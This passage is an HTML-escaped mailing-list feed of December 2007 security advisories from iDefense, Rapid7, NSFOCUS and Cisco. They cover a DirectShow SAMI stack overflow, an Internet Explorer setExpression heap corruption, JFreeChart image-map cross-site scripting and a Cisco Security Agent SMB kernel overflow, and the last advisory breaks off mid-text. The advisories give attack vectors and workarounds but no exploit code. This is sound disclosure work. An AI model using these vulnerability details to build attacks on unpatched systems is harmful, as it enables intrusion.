&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Dec 11, 2007
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;Microsoft DirectShow, part of Microsoft DirectX, is used for the capture
&lt;br&gt;and playback of multimedia streams on Microsoft Windows systems.
&lt;br&gt;Synchronized Accessible Media Interchange (SAMI) is a file format
&lt;br&gt;designed by Microsoft Corp. to deliver captions, subtitles, or audio
&lt;br&gt;descriptions synchronized with digital media content.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://msdn2.microsoft.com/en-us/library/ms783323.aspx&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://msdn2.microsoft.com/en-us/library/ms783323.aspx&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://msdn2.microsoft.com/en-us/library/bb248347.aspx&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://msdn2.microsoft.com/en-us/library/bb248347.aspx&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Remote exploitation of a stack buffer overflow vulnerability in
&lt;br&gt;Microsoft Corp.'s DirectShow could allow an attacker to execute
&lt;br&gt;arbitrary code in the context of the current user.
&lt;br&gt;&lt;br&gt;This vulnerability exists in the DirextShow SAMI parser, which is
&lt;br&gt;implemented in quartz.dll. When the SAMI parser copies parameters into
&lt;br&gt;a stack buffer, it does not properly check the length of the parameter.
&lt;br&gt;As such, parsing a specially crafted SAMI file can cause a stack-based
&lt;br&gt;buffer overflow. This allows an attacker to execute arbitrary code.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation allows an attacker to execute arbitrary code in the context
&lt;br&gt;of the current user.
&lt;br&gt;&lt;br&gt;In order to exploit this vulnerability, an attacker must persuade a user
&lt;br&gt;to open a malicious SAMI file. This can be accomplished by hosting a
&lt;br&gt;malicious SAMI file on a web site or by sending the malicious file to a
&lt;br&gt;user via e-mail or instant message.
&lt;br&gt;&lt;br&gt;It is important to note that a SAMI file does not necessarily have to
&lt;br&gt;end with a .smi or .sami extension. DirectShow will identify the file
&lt;br&gt;based on the file contents.
&lt;br&gt;&lt;br&gt;If &amp;quot;Web View Content&amp;quot; is enabled in Windows Explorer, which is the
&lt;br&gt;default setting, a single click will open the malicious file in the
&lt;br&gt;preview pane and trigger the vulnerability.
&lt;br&gt;&lt;br&gt;DirectX 9.0c is listed as an optional update for Windows 2000 operating
&lt;br&gt;system in Windows Update site. It is not listed as a critical update.
&lt;br&gt;However, installing this update will remove this vulnerability.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed Microsoft DirectX 7.x and Microsoft DirectX 8.x
&lt;br&gt;are vulnerable. Microsoft DirectX 9.0c or newer is not vulnerable.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;To prevent exploitation of this vulnerability, upgrade to DirectX 9.0c
&lt;br&gt;or newer.
&lt;br&gt;&lt;br&gt;If upgrading is not possible, you can prevent access to the vulnerable
&lt;br&gt;code by un-registering quartz.dll as shown below. However, this
&lt;br&gt;workaround will disable image, audio, and video rendering in
&lt;br&gt;DirectX-enabled applications.
&lt;br&gt;&lt;br&gt;&amp;nbsp; C:\&amp;gt; regsvr32 -u %windir%\system32\quartz.dll
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;Microsoft has addressed this vulnerability within Microsoft Security
&lt;br&gt;Bulletin MS07-064. For more information, consult their bulletin at the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.microsoft.com/technet/security/Bulletin/MS07-064.mspx&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.microsoft.com/technet/security/Bulletin/MS07-064.mspx&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-3901 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;09/28/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;10/09/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;12/11/2007 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was discovered by Jun Mao of VeriSign iDefense Labs.
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2007 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14341796&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-12.11.07%3A-Microsoft-DirectX-7-and-8-DirectShow-Stack-Buffer-Overflow-Vulnerability-tp14341796p14341796.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14340804</id>
	<title>iDefense Security Advisory 12.11.07: Microsoft Internet Explorer JavaScript setExpression Heap Corruption Vulnerability</title>
	<published>2007-12-12T11:02:40Z</published>
	<updated>2007-12-12T11:02:40Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 12.11.07
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Dec 11, 2007
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;Internet Explorer is a graphical web browser developed by Microsoft
&lt;br&gt;Corp. and included as part of Microsoft Windows since 1995. The
&lt;br&gt;setExpression method is commonly used to assign a JavaScript expression
&lt;br&gt;to a CSS or DHTML object within a web page. For more information, visit
&lt;br&gt;the following URLs.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.microsoft.com/ie/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.microsoft.com/ie/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/setexpression.asp&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/setexpression.asp&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Remote exploitation of a heap corruption vulnerability in Microsoft
&lt;br&gt;Corp.'s Internet Explorer web browser allows attackers to execute
&lt;br&gt;arbitrary code in the context of the current user.
&lt;br&gt;&lt;br&gt;The vulnerability lies in the JavaScript setExpression method, which is
&lt;br&gt;implemented in mshtml.dll. When malformed parameters are supplied,
&lt;br&gt;memory can be corrupted in a way that results in Internet Explorer
&lt;br&gt;accessing a previously deleted object. By creating a specially crafted
&lt;br&gt;web page, it is possible for an attacker to control the contents of the
&lt;br&gt;memory pointed to by the released object. This allows an attacker to
&lt;br&gt;execute arbitrary code.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation of this vulnerability would allow an attacker to execute
&lt;br&gt;arbitrary code in the context of the user running Internet Explorer.
&lt;br&gt;&lt;br&gt;In order to exploit this vulnerability, an attacker must persuade a user
&lt;br&gt;to render a malicious web page using Internet Explorer. This is usually
&lt;br&gt;accomplished by providing a link to the malicious page in an e-mail or
&lt;br&gt;instant message.
&lt;br&gt;&lt;br&gt;On Windows Vista, Internet Explorer 7 runs in &amp;quot;Protected Mode&amp;quot;. Since
&lt;br&gt;&amp;quot;Protected Mode&amp;quot; processes web pages with lower privileges than a
&lt;br&gt;normal user, it lessens the impact of this vulnerability. However, it
&lt;br&gt;does not prevent arbitrary code execution on the affected system.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;As of April 5th, 2007, iDefense testing shows that Internet Explorer 6.0
&lt;br&gt;and Internet Explorer 7.0 with all available security patches are
&lt;br&gt;vulnerable. Older versions of Internet Explorer may also be vulnerable.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;Disable Active Scripting (JavaScript) to prevent exploitation of this
&lt;br&gt;issue. Applying this workaround will prevent proper rendering of web
&lt;br&gt;sites that rely on JavaScript.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;Microsoft has addressed this vulnerability within Microsoft Security
&lt;br&gt;Bulletin MS07-069. For more information, consult their bulletin at the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx&lt;/a&gt;&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-3902 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;05/08/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;05/08/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;12/11/2007 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was reported to iDefense by Peter Vreugdenhil
&lt;br&gt;(&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14340804&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;).
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2007 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14340804&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-12.11.07%3A-Microsoft-Internet-Explorer-JavaScript-setExpression-Heap-Corruption-Vulnerability-tp14340804p14340804.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14204274</id>
	<title>R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities</title>
	<published>2007-12-06T14:58:11Z</published>
	<updated>2007-12-06T14:58:11Z</updated>
	<author>
		<name>advisory-5</name>
	</author>
	<content type="html">_______________________________________________________________________
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Rapid7 Security Advisory
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Visit &lt;a href=&quot;http://www.rapid7.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rapid7.com/&lt;/a&gt;&amp;nbsp;to download NeXpose,
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SC Magazine Winner of Best Vulnerability Management product.
&lt;br&gt;_______________________________________________________________________
&lt;br&gt;&lt;br&gt;Rapid7 Advisory R7-0031
&lt;br&gt;JFreeChart Image Map Cross-Site Scripting Vulnerabilities
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Published: &amp;nbsp;Dec 06, 2007
&lt;br&gt;&amp;nbsp; &amp;nbsp;Revision: &amp;nbsp; 1.0
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://www.rapid7.com/advisories/R7-0031.jsp&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rapid7.com/advisories/R7-0031.jsp&lt;/a&gt;&lt;br&gt;&lt;br&gt;1. Affected system(s):
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;KNOWN VULNERABLE:
&lt;br&gt;&amp;nbsp; &amp;nbsp; o JFreeChart 1.0.8
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;KNOWN FIXED:
&lt;br&gt;&amp;nbsp; &amp;nbsp; o JFreeChart 1.0.8 branch &amp;quot;jfreechart-1.0.8-security&amp;quot;
&lt;br&gt;&lt;br&gt;2. Summary
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;JFreeChart is a popular Java-based chart library used to generate
&lt;br&gt;&amp;nbsp; &amp;nbsp;charts and graphs of data. &amp;nbsp;The library includes support for
&lt;br&gt;&amp;nbsp; &amp;nbsp;generating HTML image maps, which allow for enhanced interaction of
&lt;br&gt;&amp;nbsp; &amp;nbsp;the chart via hyperlinks bound to shapes specified by coordinates.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Multiple cross-site scripting vulnerabilities exist within the
&lt;br&gt;&amp;nbsp; &amp;nbsp;image map support functionality of JFreeChart which may allow an
&lt;br&gt;&amp;nbsp; &amp;nbsp;attacker to inject arbitrary HTML or JavaScript into any product
&lt;br&gt;&amp;nbsp; &amp;nbsp;or website which uses the library.
&lt;br&gt;&lt;br&gt;3. Vendor status and information
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;JFreeChart Project
&lt;br&gt;&amp;nbsp; &amp;nbsp;&lt;a href=&quot;http://sourceforge.net/projects/jfreechart/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://sourceforge.net/projects/jfreechart/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;The JFreeChart project was notified of this vulnerability on
&lt;br&gt;&amp;nbsp; &amp;nbsp;November 28th, 2007 via their online bug tracking system. &amp;nbsp;The
&lt;br&gt;&amp;nbsp; &amp;nbsp;vulnerability was fixed on December 6th 2007 with a commit
&lt;br&gt;&amp;nbsp; &amp;nbsp;to their SVN repository.
&lt;br&gt;&lt;br&gt;4. Solution
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Upgrade to JFreeChart SVN repository revision 682
&lt;br&gt;&amp;nbsp; &amp;nbsp;using branch &amp;quot;jfreechart-1.0.8-security&amp;quot;.
&lt;br&gt;&amp;nbsp;
&lt;br&gt;&amp;nbsp; &amp;nbsp;See &lt;a href=&quot;http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;for details.
&lt;br&gt;&lt;br&gt;5. Detailed analysis
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;JFreeChart fails to properly escape the following properties of the
&lt;br&gt;&amp;nbsp; &amp;nbsp;generated image map:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; o The chart name.
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; o The chart tool tip text.
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; o The href attribute for a chart area.
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; o The shape attribute for a chart area.
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; o The coords attribute for a chart area.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;It is possible to inject custom HTML code into the code generated by
&lt;br&gt;&amp;nbsp; &amp;nbsp;the JFreeChart library. &amp;nbsp;If a web server uses this library to generate
&lt;br&gt;&amp;nbsp; &amp;nbsp;charts from user-supplied data, an attacker could cause other users of
&lt;br&gt;&amp;nbsp; &amp;nbsp;the same website or application to execute arbitrary JavaScript code
&lt;br&gt;&amp;nbsp; &amp;nbsp;when viewing a page containing a chart.
&lt;br&gt;&lt;br&gt;6. Credit
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Discovered by Chad Loder of Rapid7.
&lt;br&gt;&lt;br&gt;7. Contact Information
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Rapid7, LLC
&lt;br&gt;&amp;nbsp; &amp;nbsp;Email: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14204274&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;advisory@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; &amp;nbsp;Web: &lt;a href=&quot;http://www.rapid7.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.rapid7.com&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Phone: +1 (617) 247-1717
&lt;br&gt;&lt;br&gt;8. Disclaimer and Copyright
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Rapid7, LLC is not responsible for the misuse of the information
&lt;br&gt;&amp;nbsp; &amp;nbsp;provided in our security advisories. These advisories are a service
&lt;br&gt;&amp;nbsp; &amp;nbsp;to the professional security community. There are NO WARRANTIES with
&lt;br&gt;&amp;nbsp; &amp;nbsp;regard to this information. Any application or distribution of this
&lt;br&gt;&amp;nbsp; &amp;nbsp;information constitutes acceptance AS IS, at the user's own risk.
&lt;br&gt;&amp;nbsp; &amp;nbsp;This information is subject to change without notice.
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby
&lt;br&gt;&amp;nbsp; &amp;nbsp;granted to redistribute this advisory, providing that no changes are
&lt;br&gt;&amp;nbsp; &amp;nbsp;made and that the copyright notices and disclaimers remain intact.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/R7-0031%3A-JFreeChart-Image-Map-Cross-Site-Scripting-Vulnerabilities-tp14204274p14204274.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14196264</id>
	<title>NSFOCUS SA2007-02 : Cisco Security Agent Remote Buffer Overflow Vulnerability</title>
	<published>2007-12-05T21:44:53Z</published>
	<updated>2007-12-05T21:44:53Z</updated>
	<author>
		<name>NSFOCUS Security Team</name>
	</author>
	<content type="html">NSFOCUS Security Advisory (SA2007-02)
&lt;br&gt;&lt;br&gt;Cisco Security Agent Remote Buffer Overflow Vulnerability
&lt;br&gt;&lt;br&gt;Release Date: 2007-12-06
&lt;br&gt;&lt;br&gt;CVE ID: CVE-2007-5580
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.nsfocus.com/english/homepage/research/0702.htm&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.nsfocus.com/english/homepage/research/0702.htm&lt;/a&gt;&lt;br&gt;&lt;br&gt;Affected systems &amp; software
&lt;br&gt;===================
&lt;br&gt;&lt;br&gt;&amp;nbsp;Cisco Security Agent for Windows &amp;lt; 4.5.1.672
&lt;br&gt;&amp;nbsp;Cisco Security Agent for Windows &amp;lt; 5.0.0.225
&lt;br&gt;&amp;nbsp;Cisco Security Agent for Windows &amp;lt; 5.1.0.106
&lt;br&gt;&amp;nbsp;Cisco Security Agent for Windows &amp;lt; 5.2.0.238
&lt;br&gt;&lt;br&gt;Unaffected systems &amp; software
&lt;br&gt;===================
&lt;br&gt;&lt;br&gt;&lt;br&gt;Summary
&lt;br&gt;=========
&lt;br&gt;&lt;br&gt;NSFOCUS Security Team discovered a remote buffer overflow vulnerability in 
&lt;br&gt;Cisco Security Agent for Windows which allows remote code execution by sending 
&lt;br&gt;a malicious SMB request. 
&lt;br&gt;&lt;br&gt;Description
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;Cisco Security Agent is a security software agent that provides threat protection 
&lt;br&gt;for server and desktop computing systems. 
&lt;br&gt;&lt;br&gt;A driver bundled with Cisco Security Agent for Windows does not correctly 
&lt;br&gt;check the data length provided by users when processing a SMB packet, which 
&lt;br&gt;might trigger a stack buffer overflow in the system kernel. A remote attacker 
&lt;br&gt;might cause system with CSA installed to restart or BSOD. By sending carefully 
&lt;br&gt;crafted data an attacker might cause remote code execution, thus gains complete 
&lt;br&gt;control over the system. 
&lt;br&gt;&lt;br&gt;By default CSA allows access to TCP ports 139 and 445. After establishing a 
&lt;br&gt;session to TCP ports 139 and 445, an attacker can complete an exploitation 
&lt;br&gt;without any authentication simply by sending a single packet. 
&lt;br&gt;&lt;br&gt;Cisco Security Agent for Windows version 5.2.0.225 and prior are affected. 
&lt;br&gt;Other Cisco software that uses CSA component is also affected.
&lt;br&gt;&lt;br&gt;Workaround
&lt;br&gt;=============
&lt;br&gt;&lt;br&gt;* Restrict access to TCP ports 139 and 445.
&lt;br&gt;&amp;nbsp; &amp;nbsp; 
&lt;br&gt;Vendor Status
&lt;br&gt;==============
&lt;br&gt;&lt;br&gt;2007.09.27 &amp;nbsp;Informed the vendor
&lt;br&gt;2007.10.23 &amp;nbsp;Vendor confirmed the vulnerability
&lt;br&gt;2007.12.05 &amp;nbsp;Vendor released a security advisory (cisco-sa-20071205-csa) and 
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; related patches. 
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 
&lt;br&gt;For more details about the Cisco security advisory, please refer to:
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Additional Information
&lt;br&gt;========================
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-5580 to this issue. This is a candidate for inclusion in the 
&lt;br&gt;CVE list (&lt;a href=&quot;http://cve.mitre.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org&lt;/a&gt;), which standardizes names for security problems.
&lt;br&gt;Candidates may change significantly before they become official CVE entries.
&lt;br&gt;&lt;br&gt;Acknowledgment
&lt;br&gt;===============
&lt;br&gt;&lt;br&gt;NSFOCUS Security Team
&lt;br&gt;&lt;br&gt;DISCLAIMS
&lt;br&gt;==========
&lt;br&gt;THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS &amp;quot;AS IS&amp;quot; WITHOUT WARRANTY
&lt;br&gt;OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
&lt;br&gt;EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
&lt;br&gt;BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
&lt;br&gt;INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
&lt;br&gt;EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
&lt;br&gt;DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
&lt;br&gt;ADVISORY IS NOT MODIFIED IN ANY WAY.
&lt;br&gt;&lt;br&gt;Copyright 1999-2007 NSFOCUS. All Rights Reserved. Terms of use.
&lt;br&gt;&lt;br&gt;NSFocus Security Team &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14196264&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security@...&lt;/a&gt;&amp;gt;
&lt;br&gt;NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
&lt;br&gt;(&lt;a href=&quot;http://www.nsfocus.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.nsfocus.com&lt;/a&gt;)
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/NSFOCUS-SA2007-02-%3A-Cisco-Security-Agent-Remote-Buffer-Overflow-Vulnerability-tp14196264p14196264.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14179910</id>
	<title>Cisco Security Advisory: Cisco Security Agent for Windows System Driver Remote Buffer Overflow Vulnerability</title>
	<published>2007-12-05T10:06:57Z</published>
	<updated>2007-12-05T10:06:57Z</updated>
	<author>
		<name>Cisco Systems Product Security Incident Response Team</name>
	</author>
	<content type="html">-----BEGIN PGP SIGNED MESSAGE-----
&lt;br&gt;Hash: SHA1
&lt;br&gt;&lt;br&gt;Cisco Security Advisory: Cisco Security Agent for Windows System Driver
&lt;br&gt;Remote Buffer Overflow Vulnerability
&lt;br&gt;&lt;br&gt;Advisory ID: cisco-sa-20071205-csa
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20071205-csa.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Revision 1.0
&lt;br&gt;&lt;br&gt;For Public Release 2007 December 05 1600 UTC (GMT)
&lt;br&gt;&lt;br&gt;+---------------------------------------------------------------------
&lt;br&gt;&lt;br&gt;Summary
&lt;br&gt;=======
&lt;br&gt;&lt;br&gt;A buffer overflow vulnerability exists in a system driver used by the
&lt;br&gt;Cisco Security Agent for Microsoft Windows. This buffer overflow can be
&lt;br&gt;exploited remotely and causes corruption of kernel memory, which leads
&lt;br&gt;to a Windows stop error (blue screen) or to arbitrary code execution.
&lt;br&gt;&lt;br&gt;The vulnerability is triggered during processing of a crafted TCP
&lt;br&gt;segment destined to TCP port 139 or 445. These ports are used by the
&lt;br&gt;Microsoft Server Message Block (SMB) protocol.
&lt;br&gt;&lt;br&gt;Cisco has released free software updates that address this
&lt;br&gt;vulnerability.
&lt;br&gt;&lt;br&gt;Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
&lt;br&gt;been assigned to this vulnerability.
&lt;br&gt;&lt;br&gt;This advisory is posted at
